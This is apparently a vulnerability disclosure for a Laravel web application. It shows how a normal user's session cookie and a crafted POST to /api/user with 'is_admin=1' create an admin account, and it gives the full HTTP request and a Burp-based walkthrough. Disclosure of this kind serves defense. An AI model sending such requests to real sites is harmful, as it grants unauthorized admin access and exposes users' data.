Description

Able to create an Admin account from normal User account.

Steps

1.Navigate to https://localhost/.

2.Then click on login and then register, fill the form and click Register.

3.Now login with a newly created user account with intercepting the traffics in burp.

4.Turn on the burp intercept on and refresh the page and copy the laravel_session on cookie.

5.Now send the below POST request with the copied user laravel_session.

POST /api/user HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 193
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://localhost/admin/view:modules/load_module:users/edit-user:0
Cookie: laravel_session=XDkQKNuW---Qs22;

thumbnail=&id=0&username=testaccount&password=testaccount&verify_password=testaccount&first_name=testaccount&last_name=testaccount&email=testaccount%40test.com&phone=&is_admin=1&is_active=1&basic_mode=0&api_key=

6.In the response it says 201 created. New Admin-account successfully created.

7.Now you can login with the credentials you sended on POST Request as an Admin-user on http://localhost/admin/login.

Video-PoC

https://drive.google.com/file/d/1xBuvOjIGU6W5Q5xx-HqQ0TwzYDEcUubD/view?usp=sharing

Impact

Able to create an Admin account from normal User account of the website. Access to all sensitive data's and privileges of an admin to a normal user.